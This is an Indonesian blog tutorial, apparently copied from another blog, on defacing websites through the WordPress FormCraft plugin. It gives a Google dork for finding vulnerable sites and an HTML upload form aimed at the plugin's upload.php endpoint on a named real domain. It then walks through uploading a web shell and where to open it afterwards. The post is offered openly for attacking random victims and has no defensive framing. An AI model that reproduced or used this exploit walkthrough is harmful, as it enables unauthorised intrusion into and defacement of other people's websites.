Deface Teknik FormCraft


Assalamualaikum sobat bloggers :D gimana kabarnya? kalo saya sih alhamdulillah sehat :D
Kali ini saya mau share tutorial deface dengan Wordpress Plugins FormCraft, ok langsung saja disimak ;)

Bahan - Bahan :

- Shell ( cari di google :p )
- CSRF

Script CSRF  :

<form method="POST" action="http://buildfire.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Save dengan Ekstensi HTML ! contoh : csrf.html


Langkah - Langkah :

1. Buka www.google.com, lalu masukan dork berikut :
     inurl:/wp-content/plugins/formcraft ( Kembangin lagi ;) )

2. Lalu pilih salah satu sitenya
3. Kalo sudah menemukan sitenya, masukan exploit berikut :  
    /wp-content/plugins/formcraft/file-upload/server/php/upload.php
4. Jika vuln, akan seperti ini :
5. Langkah selanjutnya adalah membuka CSRFnya :D
6. Copy sitenya dan paste di CSRF
7. Save, dan buka CSRFnya lalu Upload shell kita ;)
    * Jika tidak punya shell, cari terlebih dahulu di google, lalu download :D :p
8. Jika sukses meng upload shell, akan seperti ini :
 9. Setelah shell berhasil ke upload, tinggal dibuka deh =))

     Tempat akses shellnya disini :
     localhost/wp-content/plugins/formcraft/file-upload/server/php/files/-namashell.php
      * Kadang shell juga berupa random, kayak gini '' 154897dc834ecb---aleale.php '' 

     contoh :
    localhost/wp-content/plugins/formcraft/file-upload/server/php/files/154897dc834ecb---aleale.php
    
Sumber : http://eitaro-attacker.blogspot.com/2014/12/deface-dengan-wordpress-plugins.html

Subscribe to receive free email updates: